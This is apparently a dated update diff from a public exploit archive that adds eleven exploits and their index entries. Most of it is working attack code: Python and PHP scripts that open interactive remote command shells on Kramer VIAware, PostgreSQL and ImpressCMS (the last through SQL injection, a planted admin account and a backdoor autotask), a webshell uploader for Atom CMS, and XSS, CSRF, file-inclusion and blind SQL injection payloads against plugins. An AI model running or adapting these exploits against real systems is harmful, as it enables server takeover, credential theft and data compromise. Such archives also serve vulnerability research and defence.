DB: 2022-03-31

11 changes to exploits/shellcodes

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
Atom CMS 2.0 - Remote Code Execution (RCE)
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
WordPress Plugin admin-word-count-column 2.2 - Local File Read
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS

exploits/hardware/remote/50848.py

@@ -0,0 +1,111 @@
+# Exploit Title: Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)
+# Date: 28/03/2022
+# Exploit Author: sharkmoos & BallO
+# Vendor Homepage: https://www.kramerav.com/
+# Software Link: https://www.kramerav.com/us/product/viaware
+# Version: 2.5.0719.1034
+# Tested on: ViaWare Go (Windows 10)
+# CVE : CVE-2019-17124
+
+import requests, sys, urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def adminLogin(s, host, username, password):
+    headers = {
+        "Host": f"{host}",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+        "Accept-Language": "en-GB,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate",
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Origin": f"https://{host}",
+        "Referer": f"https://{host}/admin/login.php",
+        "Upgrade-Insecure-Requests": "1",
+        "Sec-Fetch-Dest": "document",
+        "Sec-Fetch-Mode": "navigate",
+        "Sec-Fetch-Site": "same-origin",
+        "Sec-Fetch-User": "?1",
+        "Sec-Gpc": "1",
+        "Te": "trailers",
+        "Connection": "close"
+        }
+    data = {
+        "txtUserId": username,
+        "txtPwd": password,
+        "btnOk" :"Login"
+        }
+    response = s.post(f"https://{host}/admin/login.php", verify=False)
+    if len(s.cookies) < 1:
+        return False
+    else:
+        return True
+
+
+def writeCommand(session, host, command):
+    headers = {
+    "Host": f"{host}",
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
+    "Accept": "text/html, */*",
+    "Accept-Language": "en-GB,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate",
+    "Content-Type": "application/x-www-form-urlencoded",
+    "X-Requested-With": "XMLHttpRequest",
+    "Origin": f"https://{host}",
+    "Referer": f"https://{host}/browseSystemFiles.php?path=C:\Windows&icon=browser",
+    "Sec-Fetch-Dest": "empty",
+    "Sec-Fetch-Mode": "cors",
+    "Sec-Fetch-Site": "same-origin",
+    "Sec-Gpc": "1",
+    "Te": "trailers",
+    "Connection": "close"
+    }
+    data = {
+        "radioBtnVal":f"{command}",
+        "associateFileName": "C:/tc/httpd/cgi-bin/exploit.cmd"
+        }
+    session.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data)
+
+
+def getResult(session, host):
+    file = session.get(f"https://{host}/cgi-bin/exploit.cmd", verify=False)
+    pageText = file.text
+    if len(pageText) < 1:
+        result = "Command did not return a result"
+    else:
+        result = pageText
+    return result
+
+
+
+def main(host, username="su", password="supass"):
+    s = requests.Session()
+    # comment this line to skip the login stage
+    loggedIn = adminLogin(s, host, username, password)
+
+    if not loggedIn:
+        print("Could not successfully login as the admin")
+        sys.exit(1)
+    else:
+        pass
+
+    command = ""
+    while command != "exit":
+        command = input("cmd:> ").strip()
+        writeCommand(s, host, command)
+        print(getResult(s, host))
+    exit()
+
+if __name__ == "__main__":
+
+    args = sys.argv
+    numArgs = len(args)
+    if  numArgs < 2:
+        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
+        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")
+    if numArgs == 2:
+        main(args[1])
+    if numArgs == 4:
+        main(args[1], args[2], args[3])
+    if numArgs > 4:
+        print(f"Run script in format:\n\n\tpython3 {args[0]} target\n")
+        print(f"[Optional] Provide Admin Credentials\n\n\tpython3 {args[0]} target su supass")

exploits/multiple/remote/50847.py

@@ -0,0 +1,113 @@
+# Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-03-29
+# Exploit Author: b4keSn4ke
+# Github: https://github.com/b4keSn4ke
+# Vendor Homepage: https://www.postgresql.org/
+# Software Link: https://www.postgresql.org/download/linux/debian/
+# Version: 9.3 - 11.7
+# Tested on: Linux x86-64 - Debian 4.19
+# CVE: CVE-2019–9193
+
+#!/usr/bin/python3
+
+import psycopg2
+import argparse
+import hashlib
+import time
+
+def parseArgs():
+    parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution')
+    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
+    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
+    parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]')
+    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
+    parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]')
+    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
+    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')
+    args = parser.parse_args()
+    return args
+
+def main():
+    try:
+        print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port))
+        connection = psycopg2.connect (
+            database=args.database,
+            user=args.user,
+            password=args.password,
+            host=args.ip,
+            port=args.port,
+            connect_timeout=args.timeout
+        )
+        print ("[+] Connection to Database established")
+
+        print ("[+] Checking PostgreSQL version")
+        checkVersion(connection)
+
+        if(args.command):
+            exploit(connection)
+        else:
+            print ("[+] Add the argument -c [COMMAND] to execute a system command")
+
+    except psycopg2.OperationalError as e:
+        print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e))
+        exit()
+
+def checkVersion(connection):
+    cursor = connection.cursor()
+    cursor.execute("SELECT version()")
+    record = cursor.fetchall()
+    cursor.close()
+
+    result = deserialize(record)
+    version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4])
+
+    if (version >= 9.3 and version <= 11.7):
+        print("[+] PostgreSQL {0} is likely vulnerable".format(version))
+
+    else:
+        print("[-] PostgreSQL {0} is not vulnerable".format(version))
+        exit()
+
+def deserialize(record):
+    result = ""
+    for rec in record:
+        result += rec[0]+"\r\n"
+    return result
+
+def randomizeTableName():
+    return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest())
+
+def exploit(connection):
+    cursor = connection.cursor()
+    tableName = randomizeTableName()
+    try:
+        print ("[+] Creating table {0}".format(tableName))
+        cursor.execute("DROP TABLE IF EXISTS {1};\
+                        CREATE TABLE {1}(cmd_output text);\
+                        COPY {1} FROM PROGRAM '{0}';\
+                        SELECT * FROM {1};".format(args.command,tableName))
+
+        print ("[+] Command executed\r\n")
+
+        record = cursor.fetchall()
+        result = deserialize(record)
+
+        print(result)
+        print ("[+] Deleting table {0}\r\n".format(tableName))
+
+        cursor.execute("DROP TABLE {0};".format(tableName))
+        cursor.close()
+
+    except psycopg2.errors.ExternalRoutineException as e:
+        print ("[-] Command failed : {0}".format(e.pgerror))
+        print ("[+] Deleting table {0}\r\n".format(tableName))
+        cursor = connection.cursor()
+        cursor.execute("DROP TABLE {0};".format(tableName))
+        cursor.close()
+
+    finally:
+        exit()
+
+if __name__ == "__main__":
+    args = parseArgs()
+    main()

exploits/php/webapps/50839.php

@@ -0,0 +1,191 @@
+# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE)
+# Exploit Author: Egidio Romano aka EgiX
+# Date: 30/03/2022
+# Version: <= 1.4.2
+# Venor: https://www.impresscms.org
+# CVE: CVE-2021-26599
+
+<?php
+
+/*
+    ----------------------------------------------------------
+    ImpressCMS <= 1.4.2 SQL Injection to Remote Code Execution
+    ----------------------------------------------------------
+
+    author..............: Egidio Romano aka EgiX
+    mail................: n0b0d13s[at]gmail[dot]com
+    software link.......: https://www.impresscms.org
+
+    +-------------------------------------------------------------------------+
+    | This proof of concept code was written for educational purpose only.    |
+    | Use it at your own risk. Author will be not responsible for any damage. |
+    +-------------------------------------------------------------------------+
+
+    [-] Vulnerability Description:
+
+    User input passed through the "groups" POST parameter to the /include/findusers.php script is not
+    properly sanitized before being passed to the icms_member_Handler::getUserCountByGroupLink() and
+    icms_member_Handler::getUsersByGroupLink() methods. These methods use the first argument to
+    construct a SQL query without proper validation, and this can be exploited by remote attackers
+    to e.g. read sensitive data from the "users" database table through boolean-based SQL Injection
+    attacks. The application uses PDO as a database driver, which allows for stacked SQL queries,
+    as such this vulnerability could be exploited to e.g. create a new admin user and execute
+    arbitrary PHP code.
+
+    [-] CVE Reference:
+
+    The Common Vulnerabilities and Exposures project (cve.mitre.org)
+    has assigned the name CVE-2021-26599 to this vulnerability.
+
+    [-] Disclosure timeline:
+
+    [19/01/2021] - Vendor notified through HackerOne
+    [29/01/2021] - Vulnerability acknowledged by the vendor
+    [03/02/2021] - CVE number assigned
+    [06/02/2022] - Version 1.4.3 released, vulnerability not correctly fixed
+    [11/02/2022] - Vendor was informed about the ineffective fix
+    [09/03/2022] - Version 1.4.4 released
+    [22/03/2022] - Public disclosure
+
+    [-] Technical writeup:
+
+    http://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce
+*/
+
+set_time_limit(0);
+error_reporting(E_ERROR);
+
+if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
+
+function hex_enc($input)
+{
+    for ($i = 0; $i < strlen($input); $i++)
+    	$encoded .= sprintf("%02x", ord($input[$i]));
+    return "0x{$encoded}";
+}
+
+print "+-----------------------------------------------------------+\n";
+print "| ImpressCMS <= 1.4.2 Remote Code Execution Exploit by EgiX |\n";
+print "+-----------------------------------------------------------+\n";
+
+if ($argc != 2)
+{
+    print "\nUsage: php $argv[0] <URL>";
+    print "\nExample.: php $argv[0] http://localhost/impresscms/";
+    print "\nExample.: php $argv[0] https://www.impresscms.org/\n\n";
+    die();
+}
+
+$url = $argv[1];
+$ch  = curl_init();
+
+curl_setopt($ch, CURLOPT_HEADER, true);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+
+print "\n[+] Retrieving security token (CVE-2021-26598)\n";
+
+curl_setopt($ch, CURLOPT_URL, "{$url}misc.php?action=showpopups&type=friend");
+
+$res = curl_exec($ch);
+
+if (!preg_match("/(cookie: [^;]+); path/i", $res, $sid)) die("[-] Session coookie not found!\n");
+if (!preg_match("/TOKEN_REQUEST' value='([^']+)'/", $res, $token)) die("[-] Token not found!\n");
+
+print "[+] Starting SQL Injection attack (CVE-2021-26599)\n";
+print "[*] Step 1: retrieving database name\n";
+
+curl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php");
+curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1]]);
+
+$params = "user_submit=1&token={$token[1]}&groups[]=%s";
+
+$min = true;
+$idx = 1;
+
+while(1)
+{
+    $test = 256;
+
+    for ($i = 7; $i >= 0; $i--)
+    {
+	$test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
+	$sql  = "1) AND ORD(SUBSTR(DATABASE(),{$idx},1))<{$test}#";
+	curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
+	$min = !preg_match("/No Users Found/", curl_exec($ch));
+    }
+
+    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
+    $dbname .= chr($chr); $min = true; $idx++;
+    print "\r[+] DB name: {$dbname}";
+}
+
+print "\n[*] Step 2: retrieving tables prefix\n";
+
+$sub = "SELECT TRIM(TRAILING 'users' FROM table_name) FROM information_schema.tables WHERE table_schema='{$dbname}' AND table_name LIKE '%users'";
+$min = true;
+$idx = 1;
+
+while(1)
+{
+    $test = 256;
+
+    for ($i = 7; $i >= 0; $i--)
+    {
+	$test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));
+	$sql  = hex_enc("SELECT IF(ORD(SUBSTR(({$sub}),{$idx},1))<{$test},1,SLEEP(1))");
+	$sql  = "0); SET @q = {$sql}; PREPARE stmt FROM @q; EXECUTE stmt;#";
+	curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
+	$start = time(); curl_exec($ch); $secs = time() - $start;
+	$min = ($secs < 2);
+    }
+
+    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;
+    $prefix .= chr($chr); $min = true; $idx++;
+    print "\r[+] Prefix: {$prefix}";
+}
+
+print "\n[*] Step 3: creating new admin user\n";
+
+$uid = time();
+$enc = hex_enc("egix");
+$pwd = hex_enc(md5("egix"));
+$sql = "0); INSERT INTO {$prefix}users (uid, uname, login_name, pass, level, enc_type) VALUES ({$uid}, {$enc}, {$enc}, {$pwd}, 5, 0)#";
+
+curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
+curl_exec($ch);
+
+$sql = "0); INSERT INTO {$prefix}groups_users_link (groupid, uid) VALUES (1, {$uid})#";
+
+curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf($params, urlencode($sql)));
+curl_exec($ch);
+
+print "[+] Trying to login as the new user\n";
+
+curl_setopt($ch, CURLOPT_URL, "{$url}user.php");
+curl_setopt($ch, CURLOPT_POSTFIELDS, "uname=egix&pass=egix&op=login");
+
+if (!preg_match("/(cookie: [^;]+); path/i", curl_exec($ch), $sid)) die("[-] Login failed!\n");
+
+print "[+] Creating malicious autotask\n";
+
+$phpcode = urlencode("if (isset(\$_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode(\$_SERVER[HTTP_CMD])); die; }");
+
+curl_setopt($ch, CURLOPT_URL, "{$url}modules/system/admin.php");
+curl_setopt($ch, CURLOPT_HTTPHEADER, [$sid[1], "Referer: {$url}"]);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "fct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks");
+
+if (!preg_match("/HTTP.*302/i", curl_exec($ch))) die("[-] Something went wrong!\n");
+
+print "[+] Launching shell\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POST, false);
+
+while(1)
+{
+    print "\nimpresscms-shell# ";
+    if (($cmd = trim(fgets(STDIN))) == "exit") break;
+    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
+    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}

exploits/php/webapps/50840.py

@@ -0,0 +1,110 @@
+# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)
+# Date: 22.03.2022
+# Exploit Author: Ashish Koli (Shikari)
+# Vendor Homepage: https://thedigitalcraft.com/
+# Software Link: https://github.com/thedigicraft/Atom.CMS
+# Version: 2.0
+# Tested on: Ubuntu 20.04.3 LTS
+# CVE: CVE-2022-25487
+
+# Description
+This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.
+
+# Usage : python3 exploit.py <IP> <Port> <atomcmspath>
+# Example:  python3 exploit.py 127.0.0.1 80 /atom
+
+# POC Exploit: https://youtu.be/qQrq-eEpswc
+# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:
+# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC
+
+'''
+Description:
+A file upload functionality in Atom CMS 2.0 allows any
+non-privileged user to gain access to the host through the uploaded files,
+which may result in remote code execution.
+'''
+
+#!/usr/bin/python3
+'''
+Import required modules:
+'''
+import sys
+import requests
+import json
+import time
+import urllib.parse
+import struct
+import re
+import string
+import linecache
+
+
+
+proxies = {
+   'http': 'http://localhost:8080',
+   'https': 'https://localhost:8080',
+}
+
+'''
+User Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+atomcmspath = sys.argv[3]
+
+
+'''
+Get cookie
+'''
+session = requests.Session()
+link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
+response = session.get(link)
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+
+'''
+Upload Webshell:
+'''
+# Construct Header:
+header1 = {
+    'Host': target_ip,
+    'Accept': 'application/json',
+    'Cache-Control': 'no-cache',
+    'X-Requested-With': 'XMLHttpRequest',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
+    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
+    'Origin': 'http://' + target_ip,
+    'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
+    'Accept-Encoding': 'gzip, deflate',
+    'Accept-Language': 'en-US,en;q=0.9',
+    'Cookie': cookie,
+    'Connection': 'close',
+
+}
+
+
+# loading Webshell payload:
+path = 'shell.txt'
+fp = open(path,'rb')
+data= fp.read()
+
+
+# Uploading Webshell:
+link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
+upload = requests.post(link_upload, headers=header1, data=data)
+
+p=upload.text
+x = re.sub("\s", "\n", p)
+y = x.replace("1<br>Unknown", "null")
+z = re.sub('[^0-9]', '', y)
+
+'''
+Finish:
+'''
+print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
+print('')

exploits/php/webapps/50841.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
+# Date: 2022-03-22
+# Author: Milad karimi
+# Software Link: https://www.drupal.org/project/avatar_uploader
+# Version: v7.x-1.0-beta8
+# Tested on: Windows 10
+# CVE: N/A
+
+1. Description:
+This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>

exploits/php/webapps/50842.txt

@@ -0,0 +1,29 @@
+# Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)
+# Date: 24-03-2022
+# Exploit Author: Hassan Khan Yusufzai - Splint3r7
+# Vendor Homepage: https://wordpress.org/plugins/curtain/
+# Version: 1.0.2
+# Tested on: Firefox
+
+## Summary:
+
+Cross site forgery vulnerability has been identified in curtain WordPress plugin that allows an attacker to to activate or deactivate sites maintenance mode.
+
+## Vulnerable URL:
+
+http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0
+
+## CSRF POC Exploit
+
+```
+<html>
+  <body>
+    <form action="http://localhost:10003/wp-admin/options-general.php">
+      <input type="hidden" name="page" value="curtain" />
+      <input type="hidden" name="&#95;wpnonce" value="" />
+      <input type="hidden" name="mode" value="0" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+```

exploits/php/webapps/50843.txt

@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
+# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
+# Date: 24-03-2022
+# Exploit Author: Hassan Khan Yusufzai - Splint3r7
+# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
+# Version: 1.0.3
+# Tested on: Firefox
+# Vulnerable File: tblight.php
+
+# Impact:
+
+Local File Read / Code Execution
+
+# Vulnerable Code:
+
+```
+if(!empty($_GET['controller']) && !empty($_GET['action']) &&
+!empty($_GET['ajax']) && $_GET['ajax'] == 1)
+{
+    require_once('' . 'controllers/'.$_GET['controller'].'.php');
+}
+```
+
+# Proof of concept:
+
+http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1
+
+# POC Code Execution:
+
+/etc/index.php:
+
+<?php echo "Local file read"; phpinfo(); ?>

exploits/php/webapps/50844.txt

@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
+# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
+# Date: 26-03-2022
+# Exploit Author: Hassan Khan Yusufzai - Splint3r7
+# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
+# Version: 1.7.4
+# Tested on: Firefox
+
+# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php
+
+# Vulnerable Code:
+
+```
+<?php
+if ($_GET['p']<=NULL) {
+	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
+}else{
+	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
+}
+```
+
+# Proof of Concept:
+
+http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
+<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]
+
+Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>

exploits/php/webapps/50845.txt

@@ -0,0 +1,31 @@
+# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
+# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
+# Date: 27-03-2022
+# Exploit Author: Hassan Khan Yusufzai - Splint3r7
+# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
+# Version: 2.2
+# Contact me: h [at] spidersilk.com
+
+# PHP version: 5.3.2 or below
+
+# Vulnerable File: plugins/admin-word-count-column/download-csv.php
+
+# Vulnerable Code:
+
+```
+<?php
+date_default_timezone_set('America/Los_Angeles');
+$csvdate = date('Md-H-i-s-T');
+$csvname = 'wordcounts-' . $csvdate . '.csv';
+header('Content-Type: application/csv');
+header('Content-Disposition: attachment; filename=' . $csvname);
+header('Pragma: no-cache');
+readfile($_GET['path'] . 'cpwc.csv');
+?>
+```
+
+# Proof of Concept:
+
+localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
+
+Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

exploits/php/webapps/50846.txt

@@ -0,0 +1,25 @@
+# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
+# Date: 2021-04-14
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
+# Version: 1.2.9
+# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
+# CVE: CVE-2021-43701
+
+*Steps to Reproduce:*
+1. First login to your Admin Panel
+2. then go to "General Menu > CSV Export / Import".
+3. open burp site and configure with browser.
+4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
+5. Now click "Export to CSV" and intercept with burp suite
+6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.
+
+*Proof of Concept:*
+http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV
+
+*Output:*
+By issuing sleep(0) response will be delayed to 0 seconds.
+By issuing sleep(1) response will be delayed to 1 seconds.
+By issuing sleep(5) response will be delayed to 5 seconds.
+By issuing sleep(10) response will be delayed to 10 seconds

exploits/php/webapps/50849.txt

@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
+# Date: 2/27/2021
+# Author: 0xB9
+# Software Link: https://wordpress.org/plugins/easy-cookies-policy/
+# Version: 1.6.2
+# Tested on: Windows 10
+# CVE: CVE-2021-24405
+
+1. Description:
+Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.
+If users can't register, this can be done through CSRF.
+
+2. Proof of Concept:
+POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: application/json, text/javascript, /; q=0.01
+Accept-Language: en-US,en;q=0.5
+Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 226
+Origin: http://localhost
+Connection: keep-alive
+Host: localhost
+Cookie: [Any authenticated user]
+
+action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd

files_exploits.csv

@@ -18656,6 +18656,8 @@ id,file,description,date,author,type,platform,port
 50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
 50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
 50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
+50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,b4keSn4ke,remote,multiple,
+50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44906,3 +44908,12 @@ id,file,description,date,author,type,platform,port
 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
 50838,exploits/php/webapps/50838.txt,"WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50839,exploits/php/webapps/50839.php,"ImpressCMS 1.4.2 - Remote Code Execution (RCE)",1970-01-01,"Egidio Romano",webapps,php,
+50840,exploits/php/webapps/50840.py,"Atom CMS 2.0 - Remote Code Execution (RCE)",1970-01-01,"Ashish Koli",webapps,php,
+50841,exploits/php/webapps/50841.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)",1970-01-01,"Milad karimi",webapps,php,
+50842,exploits/php/webapps/50842.txt,"WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50843,exploits/php/webapps/50843.txt,"WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50844,exploits/php/webapps/50844.txt,"WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
+50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50849,exploits/php/webapps/50849.txt,"WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS",1970-01-01,0xB9,webapps,php,